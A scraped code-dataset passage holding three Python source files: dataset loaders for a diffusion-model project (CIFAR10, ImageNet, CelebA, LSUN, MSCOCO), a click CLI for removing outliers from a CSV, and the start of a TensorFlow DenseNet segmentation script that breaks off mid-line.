\"\"\"\n\n def __init__(self, path, random_flip=False, cfg=False, p_uncond=None, cluster_path=None):\n super().__init__()\n if cluster_path == '':\n cluster_path = None\n\n transform_train = [transforms.ToTensor(), transforms.Normalize(0.5, 0.5)]\n transform_test = [transforms.ToTensor(), transforms.Normalize(0.5, 0.5)]\n if random_flip: # only for train\n transform_train.append(transforms.RandomHorizontalFlip())\n transform_train = transforms.Compose(transform_train)\n transform_test = transforms.Compose(transform_test)\n self.train = datasets.CIFAR10(path, train=True, transform=transform_train, download=True)\n self.test = datasets.CIFAR10(path, train=False, transform=transform_test, download=True)\n\n if cluster_path is not None:\n print(f'renew targets from {cluster_path}')\n self.train.targets = np.load(cluster_path)\n assert len(self.train.targets) == 50000\n self.K = max(self.train.targets) + 1\n self.cnt = torch.tensor([len(np.where(np.array(self.train.targets) == k)[0]) for k in range(self.K)]).float()\n self.frac = [self.cnt[k] / 50000 for k in range(self.K)]\n print(f'{self.K} classes')\n print(f'cnt: {self.cnt}')\n print(f'frac: {self.frac}')\n\n if cfg: # classifier free guidance\n assert p_uncond is not None\n print(f'prepare the dataset for classifier free guidance with p_uncond={p_uncond}')\n self.train = CFGDataset(self.train, p_uncond, self.K)\n\n @property\n def data_shape(self):\n return 3, 32, 32\n\n @property\n def fid_stat(self):\n return 'assets/fid_stats/fid_stats_cifar10_train_pytorch.npz'\n\n def sample_label(self, n_samples, device):\n return torch.multinomial(self.cnt, n_samples, replacement=True).to(device)\n\n def label_prob(self, k):\n return self.frac[k]\n\n\n# ImageNet\n\n\nclass FeatureDataset(Dataset):\n def __init__(self, path):\n super().__init__()\n self.path = path\n # names = sorted(os.listdir(path))\n # self.files = [os.path.join(path, name) for name in names]\n\n def __len__(self):\n return 1_281_167 * 2 # consider the random flip\n\n def __getitem__(self, idx):\n path = os.path.join(self.path, f'{idx}.npy')\n z, label = np.load(path, allow_pickle=True)\n return z, label\n\n\nclass ImageNet256Features(DatasetFactory): # the moments calculated by Stable Diffusion image encoder\n def __init__(self, path, cfg=False, p_uncond=None):\n super().__init__()\n print('Prepare dataset...')\n self.train = FeatureDataset(path)\n print('Prepare dataset ok')\n self.K = 1000\n\n if cfg: # classifier free guidance\n assert p_uncond is not None\n print(f'prepare the dataset for classifier free guidance with p_uncond={p_uncond}')\n self.train = CFGDataset(self.train, p_uncond, self.K)\n\n @property\n def data_shape(self):\n return 4, 32, 32\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_imagenet256_guided_diffusion.npz'\n\n def sample_label(self, n_samples, device):\n return torch.randint(0, 1000, (n_samples,), device=device)\n\n\nclass ImageNet512Features(DatasetFactory): # the moments calculated by Stable Diffusion image encoder\n def __init__(self, path, cfg=False, p_uncond=None):\n super().__init__()\n print('Prepare dataset...')\n self.train = FeatureDataset(path)\n print('Prepare dataset ok')\n self.K = 1000\n\n if cfg: # classifier free guidance\n assert p_uncond is not None\n print(f'prepare the dataset for classifier free guidance with p_uncond={p_uncond}')\n self.train = CFGDataset(self.train, p_uncond, self.K)\n\n @property\n def data_shape(self):\n return 4, 64, 64\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_imagenet512_guided_diffusion.npz'\n\n def sample_label(self, n_samples, device):\n return torch.randint(0, 1000, (n_samples,), device=device)\n\n\nclass ImageNet(DatasetFactory):\n def __init__(self, path, resolution, random_crop=False, random_flip=True, cluster_path=None, fnames_path=None):\n super().__init__()\n if cluster_path == '':\n cluster_path = None\n if fnames_path == '':\n fnames_path = None\n\n print(f'Counting ImageNet files from {path}')\n train_files = _list_image_files_recursively(os.path.join(path, 'train'))\n class_names = [os.path.basename(path).split(\"_\")[0] for path in train_files]\n sorted_classes = {x: i for i, x in enumerate(sorted(set(class_names)))}\n train_labels = [sorted_classes[x] for x in class_names]\n print('Finish counting ImageNet files')\n\n self.train = ImageDataset(resolution, train_files, labels=train_labels, random_crop=random_crop, random_flip=random_flip)\n self.resolution = resolution\n if len(self.train) != 1_281_167:\n print(f'Missing train samples: {len(self.train)} < 1281167')\n\n if cluster_path is not None:\n print(f'renew targets from {cluster_path}')\n _cluster_labels = np.load(cluster_path)\n _fnames = torch.load(fnames_path)\n fnames_cluster_labels = dict(zip(_fnames, _cluster_labels))\n self.train.labels = [fnames_cluster_labels[os.path.split(fname)[-1]] for fname in self.train.image_paths]\n\n self.K = max(self.train.labels) + 1\n cnt = dict(zip(*np.unique(self.train.labels, return_counts=True)))\n self.cnt = torch.tensor([cnt[k] for k in range(self.K)]).float()\n self.frac = [self.cnt[k] / len(self.train.labels) for k in range(self.K)]\n print(f'{self.K} classes')\n print(f'cnt[:10]: {self.cnt[:10]}')\n print(f'frac[:10]: {self.frac[:10]}')\n\n @property\n def data_shape(self):\n return 3, self.resolution, self.resolution\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_imagenet{self.resolution}_guided_diffusion.npz'\n\n def sample_label(self, n_samples, device):\n return torch.multinomial(self.cnt, n_samples, replacement=True).to(device)\n\n def label_prob(self, k):\n return self.frac[k]\n\nclass ImageNet_semi(ImageNet):\n def __init__(self, path, resolution, random_crop=False, random_flip=True, cluster_path=None, fnames_path=None, is_true_labels_path=None):\n super().__init__(path, resolution, random_crop, random_flip, cluster_path, fnames_path)\n assert is_true_labels_path is not None\n print(f'concat label with is_true_label from {is_true_labels_path}')\n _fnames = torch.load(fnames_path)\n _is_true_labels = torch.load(is_true_labels_path)\n fnames_is_true_labels = dict(zip(_fnames, _is_true_labels))\n isTruelabels = [fnames_is_true_labels[os.path.split(fname)[-1]] for fname in self.train.image_paths]\n self.train.labels = [(label, isTruelabel) for label, isTruelabel in zip(self.train.labels, isTruelabels)]\n\n\ndef _list_image_files_recursively(data_dir):\n results = []\n for entry in sorted(os.listdir(data_dir)):\n full_path = os.path.join(data_dir, entry)\n ext = entry.split(\".\")[-1]\n if \".\" in entry and ext.lower() in [\"jpg\", \"jpeg\", \"png\", \"gif\"]:\n results.append(full_path)\n elif os.listdir(full_path):\n results.extend(_list_image_files_recursively(full_path))\n return results\n\n\nclass ImageDataset(Dataset):\n def __init__(\n self,\n resolution,\n image_paths,\n labels,\n random_crop=False,\n random_flip=True,\n ):\n super().__init__()\n self.resolution = resolution\n self.image_paths = image_paths\n self.labels = labels\n self.random_crop = random_crop\n self.random_flip = random_flip\n\n def __len__(self):\n return len(self.image_paths)\n\n def __getitem__(self, idx):\n path = self.image_paths[idx]\n pil_image = Image.open(path)\n pil_image.load()\n pil_image = pil_image.convert(\"RGB\")\n\n if self.random_crop:\n arr = random_crop_arr(pil_image, self.resolution)\n else:\n arr = center_crop_arr(pil_image, self.resolution)\n\n if self.random_flip and random.random() < 0.5:\n arr = arr[:, ::-1]\n\n arr = arr.astype(np.float32) / 127.5 - 1\n\n label = np.array(self.labels[idx], dtype=np.float64)\n return np.transpose(arr, [2, 0, 1]), label\n\n\ndef center_crop_arr(pil_image, image_size):\n # We are not on a new enough PIL to support the `reducing_gap`\n # argument, which uses BOX downsampling at powers of two first.\n # Thus, we do it by hand to improve downsample quality.\n while min(*pil_image.size) >= 2 * image_size:\n pil_image = pil_image.resize(\n tuple(x // 2 for x in pil_image.size), resample=Image.BOX\n )\n\n scale = image_size / min(*pil_image.size)\n pil_image = pil_image.resize(\n tuple(round(x * scale) for x in pil_image.size), resample=Image.BICUBIC\n )\n\n arr = np.array(pil_image)\n crop_y = (arr.shape[0] - image_size) // 2\n crop_x = (arr.shape[1] - image_size) // 2\n return arr[crop_y : crop_y + image_size, crop_x : crop_x + image_size]\n\n\ndef random_crop_arr(pil_image, image_size, min_crop_frac=0.8, max_crop_frac=1.0):\n min_smaller_dim_size = math.ceil(image_size / max_crop_frac)\n max_smaller_dim_size = math.ceil(image_size / min_crop_frac)\n smaller_dim_size = random.randrange(min_smaller_dim_size, max_smaller_dim_size + 1)\n\n # We are not on a new enough PIL to support the `reducing_gap`\n # argument, which uses BOX downsampling at powers of two first.\n # Thus, we do it by hand to improve downsample quality.\n while min(*pil_image.size) >= 2 * smaller_dim_size:\n pil_image = pil_image.resize(\n tuple(x // 2 for x in pil_image.size), resample=Image.BOX\n )\n\n scale = smaller_dim_size / min(*pil_image.size)\n pil_image = pil_image.resize(\n tuple(round(x * scale) for x in pil_image.size), resample=Image.BICUBIC\n )\n\n arr = np.array(pil_image)\n crop_y = random.randrange(arr.shape[0] - image_size + 1)\n crop_x = random.randrange(arr.shape[1] - image_size + 1)\n return arr[crop_y: crop_y + image_size, crop_x: crop_x + image_size]\n\n\n# CelebA\n\n\nclass Crop(object):\n def __init__(self, x1, x2, y1, y2):\n self.x1 = x1\n self.x2 = x2\n self.y1 = y1\n self.y2 = y2\n\n def __call__(self, img):\n return F.crop(img, self.x1, self.y1, self.x2 - self.x1, self.y2 - self.y1)\n\n def __repr__(self):\n return self.__class__.__name__ + \"(x1={}, x2={}, y1={}, y2={})\".format(\n self.x1, self.x2, self.y1, self.y2\n )\n\n\nclass CelebA(DatasetFactory):\n r\"\"\" train: 162,770\n val: 19,867\n test: 19,962\n shape: 3 * width * width\n \"\"\"\n\n def __init__(self, path, resolution=64, cluster_path=None):\n super().__init__()\n if cluster_path == '':\n cluster_path = None\n self.resolution = resolution\n\n cx = 89\n cy = 121\n x1 = cy - 64\n x2 = cy + 64\n y1 = cx - 64\n y2 = cx + 64\n\n transform = transforms.Compose([Crop(x1, x2, y1, y2), transforms.Resize(self.resolution),\n transforms.RandomHorizontalFlip(), transforms.ToTensor(),\n transforms.Normalize(0.5, 0.5)])\n self.train = datasets.CelebA(root=path, split=\"train\", target_type=[], transform=transform, download=True)\n self.train = UnlabeledDataset(self.train)\n\n if cluster_path is not None:\n print(f'get targets from {cluster_path}')\n self.labels = np.load(cluster_path)\n self.train = LabeledDataset(self.train, self.labels)\n self.K = max(self.labels) + 1\n self.cnt = torch.tensor([len(np.where(np.array(self.labels) == k)[0]) for k in range(self.K)]).float()\n self.frac = [self.cnt[k] / 50000 for k in range(self.K)]\n print(f'{self.K} classes')\n print(f'cnt: {self.cnt}')\n print(f'frac: {self.frac}')\n else:\n self.labels = None\n\n @property\n def data_shape(self):\n return 3, self.resolution, self.resolution\n\n @property\n def fid_stat(self):\n return 'assets/fid_stats/fid_stats_celeba64_train_50000_ddim.npz'\n\n @property\n def has_label(self):\n return self.labels is not None\n\n def sample_label(self, n_samples, device):\n return torch.multinomial(self.cnt, n_samples, replacement=True).to(device)\n\n def label_prob(self, k):\n return self.frac[k]\n\n\n# LSUN Bedroom\n\n\nclass LSUNBedroom(DatasetFactory):\n def __init__(self, path, resolution=64):\n super().__init__()\n self.resolution = resolution\n transform = transforms.Compose([transforms.Resize(resolution), transforms.CenterCrop(resolution),\n transforms.ToTensor(), transforms.Normalize(0.5, 0.5)])\n self.train = UnlabeledDataset(datasets.LSUN(root=path, classes=[\"bedroom_train\"], transform=transform)) \\\n if os.path.exists(os.path.join(path, 'bedroom_train_lmdb')) else None\n\n @property\n def data_shape(self):\n return 3, self.resolution, self.resolution\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_lsun_bedroom{self.resolution}_train_50000.npz'\n\n @property\n def has_label(self):\n return False\n\n\nclass ImageDataset2(Dataset):\n def __init__(self, path, transform=None):\n super().__init__()\n names = sorted(os.listdir(path))\n self.local_images = [os.path.join(path, name) for name in names]\n self.transform = transform\n\n def __len__(self):\n return len(self.local_images)\n\n def __getitem__(self, idx):\n X = Image.open(self.local_images[idx])\n if self.transform is not None:\n X = self.transform(X)\n return X\n\n\nclass LSUNBedroom64(DatasetFactory):\n def __init__(self, path, cluster_path=None):\n super().__init__()\n if cluster_path == '':\n cluster_path = None\n\n train_path = os.path.join(path, 'lsun_bedroom64_train')\n transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize(0.5, 0.5)])\n self.train = ImageDataset2(path=train_path, transform=transform) if os.path.exists(train_path) else None\n\n if cluster_path is not None:\n print(f'get targets from {cluster_path}')\n self.labels = np.load(cluster_path)\n self.train = LabeledDataset(self.train, self.labels)\n self.K = max(self.labels) + 1\n self.cnt = torch.tensor([len(np.where(np.array(self.labels) == k)[0]) for k in range(self.K)]).float()\n self.frac = [self.cnt[k] / 50000 for k in range(self.K)]\n print(f'{self.K} classes')\n print(f'cnt: {self.cnt}')\n print(f'frac: {self.frac}')\n else:\n self.labels = None\n\n @property\n def data_shape(self):\n return 3, 64, 64\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_lsun_bedroom64_train_50000.npz'\n\n @property\n def has_label(self):\n return self.labels is not None\n\n def sample_label(self, n_samples, device):\n return torch.multinomial(self.cnt, n_samples, replacement=True).to(device)\n\n def label_prob(self, k):\n return self.frac[k]\n\n\n# MS COCO\n\n\ndef center_crop(width, height, img):\n resample = {'box': Image.BOX, 'lanczos': Image.LANCZOS}['lanczos']\n crop = np.min(img.shape[:2])\n img = img[(img.shape[0] - crop) // 2: (img.shape[0] + crop) // 2,\n (img.shape[1] - crop) // 2: (img.shape[1] + crop) // 2]\n try:\n img = Image.fromarray(img, 'RGB')\n except:\n img = Image.fromarray(img)\n img = img.resize((width, height), resample)\n\n return np.array(img).astype(np.uint8)\n\n\nclass MSCOCODatabase(Dataset):\n def __init__(self, root, annFile, size=None):\n from pycocotools.coco import COCO\n self.root = root\n self.height = self.width = size\n\n self.coco = COCO(annFile)\n self.keys = list(sorted(self.coco.imgs.keys()))\n\n def _load_image(self, key: int):\n path = self.coco.loadImgs(key)[0][\"file_name\"]\n return Image.open(os.path.join(self.root, path)).convert(\"RGB\")\n\n def _load_target(self, key: int):\n return self.coco.loadAnns(self.coco.getAnnIds(key))\n\n def __len__(self):\n return len(self.keys)\n\n def __getitem__(self, index):\n key = self.keys[index]\n image = self._load_image(key)\n image = np.array(image).astype(np.uint8)\n image = center_crop(self.width, self.height, image).astype(np.float32)\n image = (image / 127.5 - 1.0).astype(np.float32)\n image = einops.rearrange(image, 'h w c -> c h w')\n\n anns = self._load_target(key)\n target = []\n for ann in anns:\n target.append(ann['caption'])\n\n return image, target\n\n\ndef int2bit(x, n=8):\n x = einops.rearrange(x, '... -> ... ()')\n x = np.right_shift(x, np.arange(n))\n x = x % 2\n return x\n\n\ndef bit2int(x):\n n = x.shape[-1]\n if isinstance(x, np.ndarray):\n return (x * (2 ** np.arange(n))).sum(axis=-1)\n elif isinstance(x, torch.Tensor):\n return (x * (2 ** torch.arange(n, device=x.device))).sum(dim=-1)\n else:\n raise NotImplementedError\n\n\nclass _BitMSCOCOText(Dataset):\n def __init__(self, annFile):\n from pycocotools.coco import COCO\n self.coco = COCO(annFile)\n self.keys = list(sorted(self.coco.imgs.keys()))\n\n from transformers import CLIPTokenizer\n self.tokenizer = CLIPTokenizer.from_pretrained(\"openai/clip-vit-large-patch14\")\n self.n_bits = self.tokenizer.vocab_size.bit_length()\n\n def _load_target(self, key: int):\n return self.coco.loadAnns(self.coco.getAnnIds(key))\n\n def __len__(self):\n return len(self.keys)\n\n def __getitem__(self, index):\n key = self.keys[index]\n anns = self._load_target(key)\n ann = random.choice(anns)['caption'] # string\n\n x = self.tokenizer(ann, truncation=True, max_length=77, return_length=True,\n return_overflowing_tokens=False, padding=\"max_length\", return_tensors=\"pt\")[\"input_ids\"]\n x = x.squeeze(dim=0) # tokens\n x = x.numpy()\n x = int2bit(x, self.n_bits) # {0, 1}\n x = 2 * torch.tensor(x, dtype=torch.float32) - 1 # {-1., 1.}\n return x\n\n\nclass BitMSCOCOText(DatasetFactory):\n def __init__(self, path):\n super().__init__()\n self.train = _BitMSCOCOText(os.path.join(path, 'annotations', 'captions_train2014.json'))\n\n def unpreprocess(self, v): # to str\n # v: {-1., 1.}\n v = v > 0 # B L N\n v = bit2int(v).cpu().detach() # B L\n ss = []\n for _v in v:\n _v = list(filter(lambda x: 0 <= x <= self.train.tokenizer.vocab_size - 1, _v))\n s = self.train.tokenizer.decode(_v, skip_special_tokens=True)\n ss.append(s)\n return ss\n\n @property\n def data_shape(self):\n return 77, 16\n\n @property\n def has_label(self):\n return False\n\n\ndef get_feature_dir_info(root):\n files = glob.glob(os.path.join(root, '*.npy'))\n files_caption = glob.glob(os.path.join(root, '*_*.npy'))\n num_data = len(files) - len(files_caption)\n n_captions = {k: 0 for k in range(num_data)}\n for f in files_caption:\n name = os.path.split(f)[-1]\n k1, k2 = os.path.splitext(name)[0].split('_')\n n_captions[int(k1)] += 1\n return num_data, n_captions\n\n\nclass MSCOCOFeatureDataset(Dataset):\n # the image features are got through sample\n def __init__(self, root):\n self.root = root\n self.num_data, self.n_captions = get_feature_dir_info(root)\n\n def __len__(self):\n return self.num_data\n\n def __getitem__(self, index):\n z = np.load(os.path.join(self.root, f'{index}.npy'))\n k = random.randint(0, self.n_captions[index] - 1)\n c = np.load(os.path.join(self.root, f'{index}_{k}.npy'))\n return z, c\n\n\ndef get_karpathy_val_split_gts(path): # the ground truth for calculating captioning metrics, e.g., BLEU\n split_file = os.path.join(path, f'val_ids.npy')\n split_info = np.load(split_file)\n from pycocotools.coco import COCO\n coco_train2014 = COCO(os.path.join(path, 'captions_train2014.json'))\n coco_val2014 = COCO(os.path.join(path, 'captions_val2014.json'))\n gts = {}\n for fname, key in split_info:\n key = int(key)\n if 'train' in fname:\n gts[key] = coco_train2014.loadAnns(coco_train2014.getAnnIds(key))\n else:\n gts[key] = coco_val2014.loadAnns(coco_val2014.getAnnIds(key))\n return gts\n\n\nclass MSCOCOFeatureDatasetKarpathySplit(Dataset):\n def __init__(self, path, split, ret_key=False):\n self.path = path\n self.ret_key =ret_key\n split_file = os.path.join(path, f'{split}_ids.npy')\n self.split_info = np.load(split_file)\n\n from pycocotools.coco import COCO\n self.coco_train2014 = COCO(os.path.join(path, 'captions_train2014.json'))\n self.coco_val2014 = COCO(os.path.join(path, 'captions_val2014.json'))\n self.coco_train2014_keys = list(sorted(self.coco_train2014.imgs.keys()))\n self.coco_val2014_keys = list(sorted(self.coco_val2014.imgs.keys()))\n self.coco_train2014_keys_indexes = {key: index for index, key in enumerate(self.coco_train2014_keys)}\n self.coco_val2014_keys_indexes = {key: index for index, key in enumerate(self.coco_val2014_keys)}\n\n self.coco_train2014_num_data, self.coco_train2014_n_captions = get_feature_dir_info(os.path.join(path, 'train'))\n self.coco_val2014_num_data, self.coco_val2014_n_captions = get_feature_dir_info(os.path.join(path, 'val'))\n\n\n def __len__(self):\n return len(self.split_info)\n\n def __getitem__(self, index):\n fname, key = self.split_info[index]\n key = int(key)\n if key in self.coco_train2014_keys_indexes:\n assert key not in self.coco_val2014_keys_indexes\n assert 'train' in fname\n index = self.coco_train2014_keys_indexes[key]\n z = np.load(os.path.join(self.path, 'train', f'{index}.npy'))\n k = random.randint(0, self.coco_train2014_n_captions[index] - 1)\n c = np.load(os.path.join(self.path, 'train', f'{index}_{k}.npy'))\n else:\n assert key not in self.coco_train2014_keys_indexes\n assert 'val' in fname\n index = self.coco_val2014_keys_indexes[key]\n z = np.load(os.path.join(self.path, 'val', f'{index}.npy'))\n k = random.randint(0, self.coco_val2014_n_captions[index] - 1)\n c = np.load(os.path.join(self.path, 'val', f'{index}_{k}.npy'))\n if self.ret_key:\n return z, c, key\n else:\n return z, c\n\n\nclass MSCOCO256Features(DatasetFactory): # the moments calculated by Stable Diffusion image encoder & the contexts calculated by clip\n def __init__(self, path, cfg=False, p_uncond=None):\n super().__init__()\n print('Prepare dataset...')\n self.train = MSCOCOFeatureDataset(os.path.join(path, 'train'))\n self.test = MSCOCOFeatureDataset(os.path.join(path, 'val'))\n assert len(self.train) == 82783\n assert len(self.test) == 40504\n print('Prepare dataset ok')\n\n self.empty_context = np.load(os.path.join(path, 'empty_context.npy'))\n\n if cfg: # classifier free guidance\n assert p_uncond is not None\n print(f'prepare the dataset for classifier free guidance with p_uncond={p_uncond}')\n self.train = CFGDataset(self.train, p_uncond, self.empty_context)\n\n # text embedding extracted by clip\n # for visulization in t2i\n self.prompts, self.contexts = [], []\n for f in sorted(os.listdir(os.path.join(path, 'run_vis')), key=lambda x: int(x.split('.')[0])):\n prompt, context = np.load(os.path.join(path, 'run_vis', f), allow_pickle=True)\n self.prompts.append(prompt)\n self.contexts.append(context)\n self.contexts = np.array(self.contexts)\n\n # image embedding extracted by stable diffusion image encoder\n # for visulization in i2t\n self.img_contexts = []\n for f in sorted(os.listdir(os.path.join(path, 'run_vis_i2t')), key=lambda x: int(x.split('.')[0])):\n if f.endswith('.npy'):\n img_context = np.load(os.path.join(path, 'run_vis_i2t', f))\n self.img_contexts.append(img_context)\n self.img_contexts = np.array(self.img_contexts)\n\n @property\n def data_shape(self):\n return 4, 32, 32\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_mscoco256_val.npz'\n\n\nclass MSCOCO256FeaturesKarpathy(DatasetFactory): # only for i2t\n def __init__(self, path):\n super().__init__()\n print('Prepare dataset...')\n self.train = MSCOCOFeatureDatasetKarpathySplit(path, 'train')\n self.test = MSCOCOFeatureDatasetKarpathySplit(path, 'val', ret_key=True) # for validation\n assert len(self.train) == 113287\n print('Prepare dataset ok')\n\n self.val_gts = get_karpathy_val_split_gts(path)\n\n # image embedding extracted by stable diffusion image encoder\n # for visulization in i2t\n self.img_contexts = []\n for f in sorted(os.listdir(os.path.join(path, 'run_vis_i2t')), key=lambda x: int(x.split('.')[0])):\n if f.endswith('.npy'):\n img_context = np.load(os.path.join(path, 'run_vis_i2t', f))\n self.img_contexts.append(img_context)\n self.img_contexts = np.array(self.img_contexts)\n\n @property\n def data_shape(self):\n return 4, 32, 32\n\n\ndef get_dataset(name, **kwargs):\n if name == 'cifar10':\n return CIFAR10(**kwargs)\n elif name == 'imagenet':\n return ImageNet(**kwargs)\n elif name == 'imagenet256_features':\n return ImageNet256Features(**kwargs)\n elif name == 'imagenet512_features':\n return ImageNet512Features(**kwargs)\n elif name == 'celeba':\n return CelebA(**kwargs)\n elif name == 'lsun_bedroom':\n return LSUNBedroom(**kwargs)\n elif name == 'lsun_bedroom64':\n return LSUNBedroom64(**kwargs)\n elif name == 'mscoco256_features':\n return MSCOCO256Features(**kwargs)\n elif name == 'mscoco256_features_karpathy':\n return MSCOCO256FeaturesKarpathy(**kwargs)\n elif name == 'bit_mscoco_text':\n return BitMSCOCOText(**kwargs)\n else:\n raise NotImplementedError(name)\n","repo_name":"ML-GSAI/DPT","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":30295,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"16"}
+{"seq_id":"11364338185","text":"import click\nfrom pathlib import Path\nfrom .algorithm import (\n OutlierDetectionModel,\n TrailingZScoreConfig,\n DEFAULT_LOOKBACK_WINDOW,\n)\nfrom .utils import (\n cli_error,\n cli_print_outlier_output,\n cli_read_csv,\n cli_saved_removed_outliers,\n)\n\n\n@click.command()\n@click.argument(\"src-path\", type=Path)\n@click.argument(\"field\", type=str)\n@click.option(\n \"--dest-path\",\n default=None,\n help=(\n \"Optionally add name of output file. \"\n \"Filename is suffixed with '-altered' if this is not provided\"\n ),\n)\n@click.option(\n \"--inc-current\",\n default=False,\n type=bool,\n help=(\n \"Include the current observation in the z-score calc. This determines \"\n \"the scoring strategy described in the readme\"\n ),\n)\n@click.option(\n \"--lookback\",\n default=DEFAULT_LOOKBACK_WINDOW,\n help=\"Look back window used to calculate z scores\",\n type=int,\n)\ndef main(src_path: Path, field: str, dest_path: Path, inc_current: bool, lookback: int):\n \"\"\"\n \\b\n\n Remove outliers from a CSV.\n\n Required Arguments:\n\n - SRC-PATH: Path: Path to the csv to remove outliers from\n\n - FIELD: str: Column name of discrete variable evaluate\n \"\"\"\n\n config = TrailingZScoreConfig(\n lookback_window=lookback, z_score_incl_current=inc_current\n )\n src_path = src_path.resolve()\n if not src_path.is_file():\n cli_error(f\"File '{str(src_path)}' does not exist\")\n\n data = cli_read_csv(src_path)\n model = OutlierDetectionModel(config)\n\n try:\n if field not in data.columns:\n raise KeyError(f\"KeyError: column '{field}' not a valid column name\")\n outliers = model.fit_predict(data[field])\n except Exception as e:\n cli_error(str(e))\n\n cli_print_outlier_output(data, outliers)\n\n cli_saved_removed_outliers(src_path, data, outliers, dest_path)\n\n\n@click.group()\ndef cli():\n pass\n\n\ncli.add_command(main)\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"nicelgueta/outlier-detection","sub_path":"outliers/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"43825133185","text":"import tensorflow as tf\nimport cv2\nimport time\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom utils import *\n\ndense_block1_num = 2\ndense_block2_num = 2\ndense_block3_num = 3\ndense_block4_num = 3\ngrowth_rate = 16\ntest_number = 0\n\n\ndef dense_net(image, img_name_index, is_training=True):\n with tf.variable_scope('conv1') as scope:\n l = conv2d(image, 3, 24, 3, 1)\n\n with tf.variable_scope('conv2_3') as scope:\n l_big = bn_relu_conv(l, is_training, 24, 32, 3, 1, name='bn_relu_conv1')\n # l = bn_relu_conv(l, is_training, 32, 32, 3, 1, name='bn_relu_conv2')\n\n # 跳链接层数可以多,其他地方尽量少\n l_first_down = tf.nn.max_pool(l_big, [1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n with tf.variable_scope('block1') as scope:\n # l = conv2d(l_first_down,32,growth_rate,3,1)#delete\n l = l_first_down\n for i in range(dense_block1_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 32)\n # l = bn_relu_conv(l, is_training, growth_rate*(dense_block1_num+1), 32, 3, 1)\n block1, l = add_transition_average('transition1', l, is_training,\n input_filters=growth_rate * dense_block1_num + 32, output_filters=32)\n\n with tf.variable_scope('block2') as scope:\n # l = conv2d(l,32,growth_rate,3,1)#delete\n for i in range(dense_block2_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 32)\n # l = bn_relu_conv(l,is_training,growth_rate*(1+dense_block2_num),32,3,1)\n block2, l = add_transition_average('transition2', l, is_training,\n input_filters=growth_rate * dense_block2_num + 32, output_filters=32)\n\n with tf.variable_scope('block3') as scope:\n # l = conv2d(l, 32, growth_rate, 3, 1)\n for i in range(dense_block3_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 32)\n block3, l = add_transition_average('transition3', l, is_training,\n input_filters=growth_rate * dense_block3_num + 32, output_filters=32)\n\n with tf.variable_scope('block4') as scope:\n # l = conv2d(l, 32, growth_rate, 3, 1)\n for i in range(dense_block4_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 32)\n\n with tf.variable_scope('block3_up') as scope:\n l = bn_relu_conv(l, is_training, growth_rate * dense_block4_num + 32, 32, 3, 1, name='bn_relu_conv1')\n l = upsample(l, 32, 32, 3, 2)\n l = tf.concat([l, block3], 3)\n # l=bn_relu_conv(l,is_training,64,growth_rate,3,1,name='bn_relu_conv2')\n for i in range(dense_block3_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 64)\n\n with tf.variable_scope('block2_up') as scope:\n l = bn_relu_conv(l, is_training, growth_rate * dense_block3_num + 64, 32, 3, 1, name='bn_relu_conv1')\n l = upsample(l, 32, 32, 3, 2)\n l = tf.concat([l, block2], 3)\n # l = bn_relu_conv(l, is_training, 64, growth_rate, 3, 1,name='bn_relu_conv2')\n for i in range(dense_block2_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 64)\n\n with tf.variable_scope('block1_up') as scope:\n l = bn_relu_conv(l, is_training, growth_rate * dense_block2_num + 64, 32, 3, 1, name='bn_relu_conv1')\n l = upsample(l, 32, 32, 3, 2)\n l = tf.concat([l, block1], 3)\n # l = bn_relu_conv(l, is_training, 64, growth_rate, 3, 1,name='bn_relu_conv2')\n for i in range(dense_block1_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 64)\n\n l = bn_relu_conv(l, is_training, growth_rate * dense_block1_num + 64, 32, 3, 1, name='bn_relu_conv1')\n with tf.variable_scope('upsample1') as scope:\n l = upsample(l, 32, 32, 3, 2)\n # concat\n l = tf.concat([l, l_big], 3)\n l = bn_relu_conv(l, is_training, 64, 64, 3, 1)\n l = tf.nn.dropout(l, 0.5)\n # spatial dropout,dropout rate 0.5\n l = bn_relu_conv(l, is_training, 64, 32, 1, 1, name='bn_relu_conv2')\n\n with tf.variable_scope('bn_sigmoid_conv') as scope:\n l = bn_relu_conv(l, is_training, 32, 1, 1, 1)\n\n image_conv = tf.nn.sigmoid(l)\n\n saver = tf.train.Saver()\n if ckpt and ckpt.model_checkpoint_path:\n if img_name_index == 0:\n saver.restore(sess, ckpt.model_checkpoint_path)\n print('model restored')\n return image_conv\n\n\ndef inference(image, img_name_index, is_training=True, scope_name='inference_net', scope_reuse=True):\n with tf.variable_scope(scope_name, reuse=scope_reuse) as scope:\n if scope_reuse:\n scope.reuse_variables()\n annotation_pred = dense_net(image, img_name_index, is_training)\n return annotation_pred\n\n\nsess = tf.InteractiveSession()\n# height = 960#训练图片的高\n# width = 960#训练图片的宽\nbatch_size = 40\nwrite_number = 0\nis_training = True\nprevious_time = time.clock()\ntotal_loss_list = []\nckpt = tf.train.get_checkpoint_state('E:/Tianchi/Densenet/my_network/model/')\n\npath = 'E:/Tianchi/NEW_DATA2/224_rgb/2015_224_rgb/'\nwrite_path = 'E:/Tianchi/Densenet/my_network/result_newmodel45000_2015_224/'\nimage_number = len(os.listdir(path))\nwrite_number = write_number + 1\noutput_store = 